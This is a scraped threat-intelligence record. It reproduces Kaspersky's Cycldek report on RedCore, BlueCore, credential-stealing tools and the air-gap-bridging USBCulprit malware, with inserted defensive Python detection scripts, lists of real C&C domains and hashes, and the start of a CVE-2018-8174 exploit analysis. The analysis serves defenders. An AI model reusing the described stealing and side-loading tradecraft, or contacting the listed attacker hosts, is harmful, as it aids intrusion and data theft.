When this buffer is filled, data from it is written to a file named 'RCoRes64.dat'. The data is encoded using a single-byte XOR with the key 0xFA.\n * _Device enumerator_: RedCore registers a window class intended to intercept window messages with a callback that checks if the inspected message was sent as a result of a DBT_DEVICEARRIVAL event. Such events signal the connection of a device to the system, in which case the callback verifies that this device is a new volume, and if it is, it sends a bitmap with the currently available logical drives to the C&C.\n * _RDP logger_: RedCore subscribes to an RDP connection event via ETW and notifies the C&C when it occurs. The code that handles this functionality is based on a little-known Github repository named [EventCop](<https://github.com/Mandar-Shinde/EventCop>) which is intended to obtain a list of users that connected to a system via RDP. The open-source code was modified so that instead of printing the data of the incoming connection, the malware would contact the C&C and inform it about the connection event.\n * _Proxy server_: RedCore spawns a server thread that listens on a pre-configured port (by default 49563) and accepts requests from non-localhost connections. A firewall exception is made for the process before the server starts running, and any subsequent requests passed to it from a source will be validated and passed on to the C&C in their original format.\n\nPerhaps the most notable difference between the two implants is the URL scheme they use to connect to and beacon their C&C servers. By looking for requests made using similar URL patterns in our telemetry, we were able to find multiple C&C servers and divide the underlying infrastructure based on the aforementioned two clusters. The requests by each malware type were issued only by legitimate and signed applications that were either leveraged to side-load a malicious DLL or injected with malicious code. 
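The two beacon URL patterns are the most directly usable network indicator in this write-up. As an added illustration (not code from Kaspersky's post and not the implants' own code), the following Python snippet classifies a request URL as BlueCore- or RedCore-shaped by requiring the exact path and the full parameter set from Table 1, then runs that check over a few constructed proxy log lines. The log format, IP addresses and hostnames are constructed for the example; the process names are the side-load hosts from Table 1.

```python
from urllib.parse import parse_qs, urlsplit

# Beacon URL shapes from Table 1 / Figure 4. The RedCore scheme has two forms
# that differ only by an optional 'url' parameter, so only the parameters
# common to both forms are required for a match.
BEACON_SIGNATURES = {
    "BlueCore": {"path": "/link", "params": {"url", "enpl", "encd"}},
    "RedCore": {"path": "/search.jsp", "params": {"referer", "kw", "psid"}},
}


def classify_beacon_url(url):
    """Return 'BlueCore', 'RedCore' or None for a single request URL.

    Both the exact path and every signature parameter are required, so an
    ordinary /search.jsp?q=... or /link?url=... request does not match.
    Host, port and parameter values are deliberately ignored: the post shows
    the servers varied while the scheme stayed fixed.
    """
    parts = urlsplit(url)
    params = set(parse_qs(parts.query, keep_blank_values=True))
    for cluster, sig in BEACON_SIGNATURES.items():
        if parts.path == sig["path"] and sig["params"] <= params:
            return cluster
    return None


def scan_proxy_log(lines):
    """Scan whitespace-separated proxy log lines of the constructed form
    '<timestamp> <client_ip> <process> <method> <url>' and return one hit
    per beacon-shaped request, tagged with its cluster."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) != 5:
            continue                      # skip malformed lines instead of crashing
        timestamp, client, process, method, url = fields
        cluster = classify_beacon_url(url)
        if cluster:
            hits.append({"timestamp": timestamp, "client": client,
                         "process": process, "cluster": cluster, "url": url})
    return hits


# Constructed sample log (not real telemetry). Addresses are documentation
# ranges; the process column mirrors the post's observation that the beacons
# were issued by legitimate signed binaries such as the side-load hosts in Table 1.
SAMPLE_PROXY_LOG = [
    "2020-05-12T08:01:02Z 10.10.4.21 QcConcol.exe GET http://203.0.113.10:8080/link?url=aGVsbG8&enpl=MQ&encd=Mg",
    "2020-05-12T08:01:05Z 10.10.4.21 chrome.exe GET http://intranet.example/search.jsp?q=vacation",
    "2020-05-12T08:02:17Z 10.10.7.3 wsc_proxy.exe GET http://203.0.113.11:443/search.jsp?url=x&referer=a&kw=b&psid=c",
    "2020-05-12T08:02:20Z 10.10.7.3 chrome.exe GET http://cdn.example/link?url=https://example.org",
]

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(f"{hit['timestamp']} {hit['client']} {hit['process']} -> {hit['cluster']} beacon: {hit['url']}")
```

Requiring every signature parameter keeps benign `/link?url=...` and `/search.jsp?q=...` traffic out of the results. The process column is the second, stronger signal: a beacon-shaped request from an AV helper binary rather than a browser matches the side-loading described above, which is also the detail to pivot on when hunting for the loader DLL on the client.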
All of the discovered domains were used to download further samples.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122956/cycldek_bridging_04.png>)\n\n_Figure 4: Difference in URL scheme used by each implant for C2 communication._\n\nThe conclusion that we were able to reach from this is that while all targets were diplomatic and government entities, each cluster of activity had a different geographical focus. The operators behind the BlueCore cluster invested most of their efforts in Vietnamese targets with several outliers in Laos and Thailand, while the operators of the RedCore cluster started out with a focus on Vietnam and diverted to Laos by the end of 2018. The statistics of these activities, based on the number of detected samples we witnessed downloaded from each cluster of C&Cs, are outlined in the figures below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123040/cycldek_bridging_05.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123118/cycldek_bridging_06.png>)\n\n_Figure 5: Volume of downloaded samples from C&Cs of each cluster by country and month, since mid-2018._\n\nFurthermore, considering both differences and similarities, we are able to conclude that the activities we saw are affiliated to a single actor, which we refer to as Cycldek. In several instances, we spotted unique tools crafted by the group that were downloaded from servers of both clusters. One example of this, which can be seen in the figure below, is a tool custom built by the group named USBCulprit. Two samples of it were downloaded from both BlueCore and RedCore servers. A more comprehensive list can be found in the Appendix. 
All in all, this suggests the entities operating behind those clusters are sharing multiple resources, both code and infrastructure, and operating under a single organizational umbrella.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123202/cycldek_bridging_07.png>)\n\n_Figure 6: Examples of proprietary malware named USBCulprit downloaded from servers of both clusters. Further examples are provided in the Appendix._\n\n## Info stealing and lateral movement toolset\n\nDuring the analysis, we were able to observe a variety of tools downloaded from both BlueCore and RedCore implants used for either lateral movement in the compromised networks or information stealing from infected nodes. There were several types of these tools: some were proprietary and formerly unseen in the wild; others were pieces of software copied from open-source post-exploitation frameworks, some of which were customized by the attackers to complete specific tasks.\n\nAs in the cases of RedCore and BlueCore, the downloaded tools were all invoked as side-loaded DLLs of legitimate signed applications. Such applications included AV components like wsc_proxy.exe (Avast remediation service), qcconsol.exe and mcvsshld.exe (McAfee components), as well as legitimate Microsoft and Google utilities like the resource compiler (rc.exe) and Google Update (googleupdate.exe). These tools could be used in order to bypass weak security mechanisms like application whitelisting, grant the malware additional permissions during execution or complicate incident response.\n\nAs already mentioned, the bulk of these tools are common and widespread among attackers, sometimes referred to as living-off-the-land binaries, or LOLbins. Such tools can be part of open-source and legitimate software, abused to conduct malicious activities. 
Examples include BrowserHistoryView (a Nirsoft utility to obtain browsing history from common browsers), ProcDump (a Sysinternals tool used to dump memory, possibly to obtain passwords from running processes), Nbtscan (a command line utility intended to scan IP networks for NetBIOS information) and PsExec (a Sysinternals tool used to execute commands remotely in the network, typically used for lateral movement).\n\nThe rest of the tools were either developed fully by the attackers or made use of known tools that were customized to accommodate particular attack scenarios. The following are several notable examples:\n\n * **Custom HDoor**: an old tool providing full-featured backdoor capabilities like remote machine administration, information theft, lateral movement and the launch of DDoS attacks. Developed by a hacker known as Wicked Rose, it was popular in Chinese underground forums for a while and made its way into the APT world in the form of variants based on it. One example is the [Naikon APT](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf>) that made use of the original tool. \nThe custom version used by Cycldek uses a small subset of the features, and the attackers used it to scan internal networks and create tunnels between compromised hosts in order to avoid network detections and bypass proxies. The tool allows the attackers to exfiltrate data from segregated hosts accessible through the local network but not connected to the internet.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123304/cycldek_bridging_08.png>)\n\n_Figure 7: Command line usage of the custom HDoor tool._\n\n * **JsonCookies**: proprietary tool that steals cookies from SQLite databases of Chromium-based browsers. 
For this purpose, the sqlite3.dll library is downloaded from the C&C and used during execution to parse the database and generate a JSON file named 'FuckCookies.txt' containing stolen cookie info. Entries in the file resemble this one:\n\n    {\n      \"domain\": \".google.com\",\n      \"id\": 1,\n      \"name\": \"NID\",\n      \"path\": \"/\",\n      \"value\": \"%VALUE%\"\n    }\n\n * **ChromePass**: proprietary tool that steals saved passwords from Chromium-based browser databases. The output of the parsed database is an HTML document containing a table with URLs and their corresponding stolen username and password information. This program includes a descriptive command line message that explains how to use it, as outlined below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123439/cycldek_bridging_09.png>)\n\n_Figure 8: Command line usage of the ChromePass tool._\n\n## Formerly Unreported Malware: USBCulprit\n\nOne of the most notable examples in Cycldek's toolset that demonstrates both data stealing and lateral movement capabilities is a malware we discovered and dubbed USBCulprit. This tool, which we saw downloaded by RedCore implants in several instances, is capable of scanning various paths in victim machines, collecting documents with particular extensions and passing them on to USB drives when they are connected to the system. It can also selectively copy itself to a removable drive in the presence of a particular file, suggesting it can be spread laterally by having designated drives infected and the executable in them opened manually.\n\nDuring the time the malware was active, it showed little change in functionality. Based on Kaspersky's telemetry, USBCulprit has been seen in the wild since 2014, with the latest samples emerging at the end of 2019. The most prominent addition incorporated into samples detected after 2017 is the capability to execute files with a given name from a connected USB. 
This suggests that the malware can be extended with other modules. However, we were not able to capture any such files and their purpose remains unknown.\n\nAnother change we saw is the loading scheme used for variants spotted after 2017. The older versions made use of a dropper that wrote a configuration file to disk and extracted an embedded cabinet archive containing a legitimate binary and a malicious side-loaded DLL. This was improved in the newer versions, where an additional stage was added, such that the side-loaded DLL decrypts and loads a third file from the archive containing the malicious payload. As a result, the latter can be found in its decrypted form only in memory.\n\nThis loading scheme demonstrates that the actor behind it makes use of similar TTPs seen in the previously described implants attributed to Cycldek. For example, binaries mimicking AV components are leveraged for conducting DLL load-order hijacking. In this case, one of the files dropped from the cabinet archive, named 'wrapper.exe' (originally named 'PtUserSessionWrapper.exe' and belonging to Trend Micro), forces the execution of a malicious DLL named 'TmDbgLog.dll'. Also, the malware makes use of an encrypted blob that is decrypted using RC4 and executed using a custom PE loader. The full chain is depicted in the figure below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123540/cycldek_bridging_10.png>)\n\n_Figure 9: USBCulprit's loading flow, as observed in samples after 2017._\n\nOnce USBCulprit is loaded to memory and executed, it operates in three phases:\n\n * **Bootstrap and data collection:** this stage prepares the environment for the malware's execution. Namely, it invokes two functions named 'CUSB::RegHideFileExt' and 'CUSB::RegHideFile' that modify registry keys to hide the extensions of files in Windows and verify that hidden files are not shown to the user. 
It also writes several files to disk and initializes a data structure with paths that are later used or searched by the malware. Additionally, the malware makes a single scan to collect files it intends to steal using a function named 'CUSB::USBFindFile'. They are sought by enumerating several predefined directories to locate documents with any of the following extensions: *.pdf;*.doc;*.wps;*docx;*ppt;*.xls;*.xlsx;*.pptx;*.rtf. Every document found is logged in a file that lists all targeted paths for theft within a directory, such that every checked directory has a corresponding list file.\n\nThe chosen files are then grouped into encrypted RAR archives. To achieve that, the malware extracts a 'rar.exe' command line utility, hardcoded as a cabinet archive in its binary, and runs it against every list created in the former step. The password for the archive is initialized at the beginning of the malware's execution, and is set to 'abcd!@#$' for most variants that we observed.\n\nIt is worth noting that sought documents can be filtered by their modification date. Several variants of USBCulprit perform a check for a file named 'time' within the directory from which the malware is executed. This file is expected to have a date-time value that specifies the modification timestamp beyond which files are considered of interest and should be collected. If the 'time' file doesn't exist, it is created with the default value '20160601000000', corresponding to 01/06/2016 00:00:00.\n\n * **USB connection interception and data exfiltration/delivery**: when bootstrapping and data collection are completed, the malware attempts to intercept the connection of new media and verify that it corresponds to a removable drive. This is achieved by running an infinite loop, whereby the malware is put to sleep and wakes at constant intervals to check all connected drives with the GetDriveTypeW function. 
If at least one is of type DRIVE_REMOVABLE, further actions are taken.\n\nWhen a USB is connected, the malware will verify whether stolen data should be exfiltrated to it or whether it already contains existing data that should be copied locally. To do this, a directory named '$Recyc1e.Bin' will be searched for in the drive and, if not found, will be created. This directory will be used as the target path for copying files to the drive or as the source path for obtaining them from it.\n\nTo understand which direction of file copy should take place, a special marker file named '1.txt' is searched for locally. If it exists, the malware expects to find the aforementioned '$Recyc1e.Bin' directory in the drive with previously stolen document archives and attempts to copy it to the disk. Otherwise, the local archive files will be copied to the same directory from the disk to the drive.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123634/cycldek_bridging_11.png>)\n\n_Figure 10: USBCulprit's check for the 1.txt marker, indicating if stolen files should be copied to the removable drive, or from it._\n\n * **Lateral movement and extension**: as part of the same loop mentioned above, the existence of another marker file named '2.txt' will be checked locally to decide whether lateral movement should be conducted or not. Only if this file exists will the malware's binary be copied from its local path to the '$Recyc1e.Bin' directory. It's noteworthy that we were unable to spot any mechanism that could trigger the execution of the malware upon USB connection, which leads us to believe the malware is supposed to be run manually by a human handler. Apart from the above, USBCulprit is capable of updating itself or extending its execution with further modules. This is done by looking for the existence of predefined files in the USB and executing them. 
Examples of these include {D14030E9-C60C-481E-B7C2-0D76810C6E96} and {D14030E9-C60C-481E-B7C2-0D76810C6E95}. Unfortunately, we could not obtain those files during analysis and cannot tell what their exact purpose is. We can only guess that they are used as extension modules or updated versions of the malware itself, based on their behavior. The former is an archive that is extracted to a specific directory and has its files enumerated and executed using an internal function named 'CUSB::runlist', while the latter is a binary that is copied to the %TEMP% directory and spawned as a new process.\n\nThe characteristics of the malware can give rise to several assumptions about its purpose and use cases, one of which is to reach and obtain data from air-gapped machines. This would explain the lack of any network communication in the malware, and the use of only removable media as a means of transferring inbound and outbound data. Also, we witnessed some variants issue commands to gather various pieces of host network information. These are logged to a file that is later transferred along with the stolen data to the USB and can help attackers profile whether the machine in which the malware was executed is indeed part of a segregated network.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123723/cycldek_bridging_12.png>)\n\n_Figure 11: Commands used to profile the network connectivity of the compromised host._\n\nAnother explanation is that the malware was handled manually by operators on the ground. As mentioned earlier, there is no evident mechanism for automatically executing USBCulprit from infected media, and yet we saw that the same sample was executed from various drive locations, suggesting it was indeed spread around. 
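The marker files and the '$Recyc1e.Bin' staging directory described above give a responder concrete on-disk artifacts to look for on suspect hosts and on removable media collected from them. The following Python script is an added example for that triage step; it is not code from the post or from the malware. It reports the staging directory, staged RAR archives and the two named extension files on a drive root, and interprets the '1.txt', '2.txt' and 'time' markers in the directory the sample ran from. The temporary sample tree it builds is constructed for the demonstration, and the Windows-only helper that enumerates removable drives uses GetDriveTypeW the same way the malware does.

```python
import sys
import tempfile
from datetime import datetime
from pathlib import Path

STAGING_DIR = "$Recyc1e.Bin"          # digit '1' where the real Recycle Bin has an 'l'
EXTENSION_FILES = (                   # file names the malware looks for on a drive and executes
    "{D14030E9-C60C-481E-B7C2-0D76810C6E96}",
    "{D14030E9-C60C-481E-B7C2-0D76810C6E95}",
)
DRIVE_REMOVABLE = 2                   # GetDriveTypeW return value for removable media


def list_removable_roots():
    """On Windows, enumerate removable drive roots the same way the malware picks
    drives to touch (GetDriveTypeW == DRIVE_REMOVABLE). Returns [] elsewhere."""
    if sys.platform != "win32":
        return []
    import ctypes
    kernel32 = ctypes.windll.kernel32
    buf = ctypes.create_unicode_buffer(1024)
    kernel32.GetLogicalDriveStringsW(len(buf) - 1, buf)
    roots = [r for r in buf[:].split("\0") if r]
    return [r for r in roots if kernel32.GetDriveTypeW(r) == DRIVE_REMOVABLE]


def triage_removable_root(root):
    """Look for the staging directory, staged RAR archives and the extension/update
    files on one mounted drive root. Returns a dict of findings."""
    root = Path(root)
    staging = root / STAGING_DIR
    archives = []
    if staging.is_dir():
        archives = sorted(p.name for p in staging.iterdir() if p.suffix.lower() == ".rar")
    present = [name for name in EXTENSION_FILES if (root / name).exists()]
    return {"staging_dir": staging.is_dir(), "archives": archives, "extension_files": present}


def triage_execution_dir(directory):
    """Interpret the marker files the sample reads from its own directory:
    '1.txt' present -> staged archives are copied from the drive onto the host,
    '1.txt' absent  -> local archives are copied onto the drive,
    '2.txt' present -> the malware binary is also copied onto the drive,
    'time'          -> YYYYMMDDHHMMSS cutoff; only newer documents are collected."""
    d = Path(directory)
    exfil_direction = "drive_to_host" if (d / "1.txt").exists() else "host_to_drive"
    lateral = (d / "2.txt").exists()
    cutoff = None
    time_file = d / "time"
    if time_file.exists():
        raw = time_file.read_text().strip()
        try:
            cutoff = datetime.strptime(raw, "%Y%m%d%H%M%S")
        except ValueError:
            cutoff = raw                  # keep an unparsable value for the analyst to see
    return {"exfil_direction": exfil_direction,
            "lateral_movement_enabled": lateral,
            "cutoff": cutoff}


def build_constructed_sample():
    """Create a constructed (not real) drive root and execution directory under a
    temp location so the triage functions can be exercised offline. Returns both paths."""
    base = Path(tempfile.mkdtemp(prefix="usbculprit_triage_"))
    drive = base / "drive"
    (drive / STAGING_DIR).mkdir(parents=True)
    (drive / STAGING_DIR / "docs.rar").write_bytes(b"Rar!")   # placeholder bytes, not an archive
    (drive / EXTENSION_FILES[1]).write_bytes(b"")
    exec_dir = base / "host"
    exec_dir.mkdir()
    (exec_dir / "2.txt").write_text("")
    (exec_dir / "time").write_text("20160601000000")         # default value named in the post
    return str(drive), str(exec_dir)


if __name__ == "__main__":
    drive, exec_dir = build_constructed_sample()
    print("constructed drive:", triage_removable_root(drive))
    print("constructed host dir:", triage_execution_dir(exec_dir))
    for root in list_removable_roots():                       # live drives, Windows only
        print(root, triage_removable_root(root))
```

When run against collected media, a staging directory holding RAR archives is the strongest indicator; the per-directory list files and the `rar.exe` extracted from the loader's cabinet are the companion artifacts to collect from the host before the drive is reimaged.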
This, along with the very specific files that the malware seeks as executable extensions, which could not be found as artifacts elsewhere in our investigation, points to a human factor being required to assist deployment of the malware in victim networks.\n\n## Conclusion\n\nCycldek is an example of an actor that has broader capability than publicly perceived. While most known descriptions of its activity give the impression of a marginal group with sub-par capabilities, the range of tools and timespan of operations show that the group has an extensive foothold inside the networks of high-profile targets in Southeast Asia.\n\nFurthermore, our analysis of the implants affiliated to the group gives an insight into its organizational structure. As already stated, the similarities and differences in various traits of these pieces of malware indicate that they likely originated from different arms of a single organization. It is also worth noting that we observed multiple points where such entities did not work in a well-coordinated manner, for example, infecting machines using the BlueCore implant when they were already infected with RedCore.\n\nLastly, we believe that such attacks will continue in Southeast Asian countries. The use of different tools to reach air-gapped networks in the same countries and attempts to steal data from them have been witnessed in the past. Our analysis shows this type of activity has not ceased; it has merely evolved and changed shape, in terms of malware and actors. 
We continue to track the actor and report on its activity in our Threat Intelligence Portal.\n\nFor more information about Cycldek operations, contact us at: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)\n\n### Appendix - IOCs\n\n_Note_: a full list of IOCs can be found in our reports on the subject in Kaspersky's Threat Intelligence Portal.\n\n**RedCore**:\n\nA6C751D945CFE84C918E88DF04D85798 - wsc.dll (side-loaded DLL) \n4B785345161D288D1652C1B2D5CEADA1 - msgsm64.acm (encrypted shellcode and implant)\n\n**BlueCore**:\n\n1B19175C41B9A9881B23B4382CC5935F - QcLite.dll (side-loaded DLL) \n6D2E6A61EEDE06FA9D633CE151208831 - QcLite.dll (side-loaded DLL) \n6EA33305B5F0F703F569B9EBD6035BFD - QcLite.dll (side-loaded DLL) \n600E14E4B0035C6F0C6A344D87B6C27F - stdole.tlb (encrypted shellcode and implant)\n\n**Lateral Movement and Info-Stealing Toolset:**\n\n1640EE7A414DFF996AF8265E0947DE36 - ChromePass \n1EA07468EBDFD3D9EEC59AC57A490701 - ChromePass \n07EE1B99660C8CD5207E128F44AA8CBC - JsonCookies \n809196A64CA4A32860D28760267A1A8B - Custom HDoor \n81660985276CF9B6D979753B6E581D34 - Custom HDoor \nA44804C2767DCCD4902AAE30C36E62C0 - Custom HDoor\n\n**USBCulprit**:\n\nA9BCF983FE868A275F8D9D8F5DEFACF5 - USBCulprit Loader \nC73B000313DCD2289F51B367F744DCD8 - USBCulprit Loader \n2FB731903BD12FF61E6F778FDF9926EE - USBCulprit Loader \n4A21F9B508DB19398AEE7FE4AE0AC380 - USBCulprit Loader \n6BE1362D722BA4224979DE91A2CD6242 - USBCulprit Loader \n7789055B0836A905D9AA68B1D4A50F09 - USBCulprit Loader \n782FF651F34C87448E4503B5444B6164 - USBCulprit Loader \n88CDD3CE6E5BAA49DC69DA664EDEE5C1 - USBCulprit Loader \nA4AD564F8FE80E2EE52E643E449C487D - USBCulprit Loader \n3CA7BD71B30007FC30717290BB437152 - USBCulprit Payload \n58FE8DB0F7AE505346F6E4687D0AE233 - USBCulprit Payload \nA02E2796E0BE9D84EE0D4B205673EC20 - USBCulprit Payload \nD8DB9D6585D558BA2D28C33C6FC61874 - USBCulprit Payload \n2E522CE8104C0693288C997604AE0096 - USBCulprit Payload\n\n**Toolset overlapping in both clusters:**\n\n**Common Name** | **MD5** | **Blue Cluster Domain** | **Red Cluster Domain** | **Description**\n---|---|---|---|---\nchromepass.exe | 1EA07468EBDFD3D9EEC59AC57A490701 | http://login.vietnamfar.com:8080 | http://news.trungtamwtoa.com:88 | ChromePass\ngoopdate.dll | D8DB9D6585D558BA2D28C33C6FC61874 | http://cophieu.dcsvnqvmn.com:8080 | http://mychau.dongnain.com:443, http://hcm.vietbaonam.com:443 | USBCulprit\n| | 2E522CE8104C0693288C997604AE0096 | http://nghiencuu.onetotechnologys.com:8080, http://tinmoi.thoitietdulich.com:443, http://tinmoi.thoitietdulich.com:53 | http://tinmoi.vieclamthemde.com:53, http://tinmoi.vieclamthemde.com | USBCulprit\nqclite.dll | 7FF0AF890B00DEACBF42B025DDEE8402 | http://web.hcmuafgh.com | http://tinmoi.vieclamthemde.com, http://tintuc.daikynguyen21.com | BlueCore Loading Hijacked DLL\nsilverlightmsi.dat | A44804C2767DCCD4902AAE30C36E62C0 | http://web.laovoanew.com:443, http://cdn.laokpl.com:8080 | http://login.dangquanwatch.com:53, http://info.coreders.com:8080 | Custom HDoor\n\n**C&Cs and Dropzones**:\n\nhttp://web.laovoanew[.]com - Red Cluster\n\nhttp://tinmoi.vieclamthemde[.]com - Red Cluster\n\nhttp://kinhte.chototem[.]com - Red Cluster\n\nhttp://news.trungtamwtoa[.]com - Red Cluster\n\nhttp://mychau.dongnain[.]com - Red Cluster\n\nhttp://hcm.vietbaonam[.]com - Red Cluster\n\nhttp://login.thanhnienthegioi[.]com - Red Cluster\n\nhttp://103.253.25.73 - Red Cluster\n\nhttp://luan.conglyan[.]com - Red Cluster\n\nhttp://toiyeuvn.dongaruou[.]com - Red Cluster\n\nhttp://tintuc.daikynguyen21[.]com - Red Cluster\n\nhttp://web.laomoodwin[.]com - Red Cluster\n\nhttp://login.giaoxuchuson[.]com - Red Cluster\n\nhttp://lat.conglyan[.]com - Red Cluster\n\nhttp://thegioi.kinhtevanhoa[.]com - Red Cluster\n\nhttp://laovoanew[.]com - Red Cluster\n\nhttp://cdn.laokpl[.]com - Red Cluster\n\nhttp://login.dangquanwatch[.]com - Blue Cluster\n\nhttp://info.coreders[.]com - Blue Cluster\n\nhttp://thanhnien.vietnannnet[.]com - Blue Cluster\n\nhttp://login.diendanlichsu[.]com - Blue Cluster\n\nhttp://login.vietnamfar[.]com - Blue Cluster\n\nhttp://cophieu.dcsvnqvmn[.]com - Blue Cluster\n\nhttp://nghiencuu.onetotechnologys[.]com - Blue Cluster\n\nhttp://tinmoi.thoitietdulich[.]com - Blue Cluster\n\nhttp://khinhte.chinhsech[.]com - Blue Cluster\n\nhttp://images.webprogobest[.]com - Blue Cluster\n\nhttp://web.hcmuafgh[.]com - Blue Cluster\n\nhttp://news.cooodkord[.]com - Blue Cluster\n\nhttp://24h.tinthethaoi[.]com - Blue Cluster\n\nhttp://quocphong.ministop14[.]com - Blue Cluster\n\nhttp://nhantai.xmeyeugh[.]com - Blue Cluster\n\nhttp://thoitiet.yrindovn[.]com - Blue Cluster\n\nhttp://hanghoa.trenduang[.]com - Blue Cluster", "cvss3": {}, "published": "2020-06-03T10:00:32", "type": "securelist", "title": "Cycldek: Bridging the (air) gap", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2012-0158", "CVE-2017-11882", "CVE-2018-0802"], "modified": "2020-06-03T10:00:32", "id": "SECURELIST:833C831E498502BB46DD03F0C6F4D597", "href": "https://securelist.com/cycldek-bridging-the-air-gap/97157/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-05-10T11:03:43", "description": "\n\nIn late April 2018, a new zero-day vulnerability for Internet Explorer (IE) was found using our sandbox, more than two years after the last in-the-wild example (CVE-2016-0189). This particular vulnerability and subsequent exploit are interesting for many reasons. The following article will examine the core reasons behind the latest vulnerability, CVE-2018-8174.\n\n### **Searching for the zero day**\n\nOur story begins on VirusTotal (VT), where someone uploaded an interesting exploit on April 18, 2018. 
This exploit was detected by several AV vendors including Kaspersky, specifically by our generic heuristic logic for some older Microsoft Word exploits.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133136/180508-the-king-is-dead-cve-18-1.png>)\n\n_Virustotal scan results for CVE-2018-8174_\n\nAfter the malicious sample was processed in our [sandbox system](<https://www.kaspersky.com/enterprise-security/wiki-section/products/sandbox>), we noticed that a fully patched version of Microsoft Word was successfully exploited. From this point we began a deeper analysis of the exploit. Let's take a look at the full infection chain:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133144/180508-the-king-is-dead-cve-18-2.png>)\n\n_Infection chain_\n\nThe infection chain consists of the following steps:\n\n * A victim receives a malicious Microsoft Word document.\n * After opening the malicious document, a second stage of the exploit is downloaded; an HTML page containing VBScript code.\n * The VBScript code triggers a Use After Free (UAF) vulnerability and executes shellcode.\n\n### **Initial analysis**\n\nWe'll start our analysis with the initial Rich Text Format (RTF) document, that was used to deliver the actual exploit for IE. It only contains one object, and its contents are obfuscated using a known obfuscation technique we call \"[nibble drop](<https://securelist.com/disappearing-bytes/84017/>)\".\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133151/180508-the-king-is-dead-cve-18-3.png>)\n\n_Obfuscated object data in RTF document_\n\nAfter deobfuscation and hex-decoding of the object data, we can see that this is an OLE object that contains a [URL Moniker](<https://msdn.microsoft.com/ru-ru/en-en/library/windows/desktop/ms688580\\(v=vs.85\\).aspx>) CLSID. 
Because of this, the exploit initially resembles an older vulnerability leveraging the Microsoft HTA handler ([CVE-2017-0199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>)).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133158/180508-the-king-is-dead-cve-18-4.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133205/180508-the-king-is-dead-cve-18-5.png>)\n\n_URL Moniker is used to load an IE exploit_\n\nWith the CVE-2017-0199 vulnerability, Word tries to execute the file with the default file handler based on its attributes, the Content-Type HTTP header in the server's response being one of them. Because the default handler for the \"application/hta\" Content-Type is mshta.exe, it is chosen as the OLE server to run the script unrestricted. This allows an attacker to directly call ShellExecute and launch a payload of their choice.\n\nHowever, if we follow the embedded URL in the latest exploit, we can see that the content type in the server's response is not \"application/hta\", which was a requirement for CVE-2017-0199 exploitation, but rather \"text/html\". The default OLE server for \"text/html\" is mshtml.dll, the library that contains the engine behind Internet Explorer.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133212/180508-the-king-is-dead-cve-18-6.png>)\n\n_WINWORD.exe querying registry for correct OLE server_\n\nFurthermore, the page contains VBScript, which is loaded with a safemode flag set to its default value, '0xE'. 
Because this disallows an attacker from directly executing a payload, as was the case with the HTA handler, an Internet Explorer exploit is needed to overcome that.\n\nUsing a URL moniker like that to load a remote web page is possible because Microsoft's patch for Moniker-related vulnerabilities (CVE-2017-0199, CVE-2017-8570 and CVE-2017-8759) only introduced an activation filter, which allows applications to specify which COM objects are restricted from instantiating at runtime.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133220/180508-the-king-is-dead-cve-18-7.png>)\n\n_Some of the filtered COM objects, restricted from creation by IActivationFilter in MSO.dll_\n\nAt the time of this analysis, the list of filtered CLSIDs consisted of 16 entries. The MSHTML CLSID ({25336920-03F9-11CF-8FD0-00AA00686F13}) is not in the list, which is why the MSHTML COM server is successfully created in the Word context.\n\nThis is where it becomes interesting. Despite a Word document being the initial attack vector, the vulnerability is actually in VBScript, not in Microsoft Word. This is the first time we've seen a URL Moniker used to load an IE exploit, and we believe this technique will be used heavily by malware authors in the future. 
This technique allows one to load and render a web page using the IE engine, even if the default browser on a victim's machine is set to something different.\n\nThe VBScript in the downloaded HTML page contains both function names and integer values that are obfuscated.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133228/180508-the-king-is-dead-cve-18-8.png>)\n\n_Obfuscated IE exploit_\n\n### **Vulnerability root cause analysis**\n\nFor the root cause analysis we only need to look at the first function ('TriggerVuln') in the deobfuscated version, which is called right after 'RandomizeValues' and 'CookieCheck'.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133234/180508-the-king-is-dead-cve-18-9.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133240/180508-the-king-is-dead-cve-18-10.png>)\n\n_Vulnerability Trigger procedure after deobfuscation_\n\nTo achieve the desired heap layout and to guarantee that the freed class object memory will be reused by the 'ClassToReuse' object, the exploit allocates some class objects. 
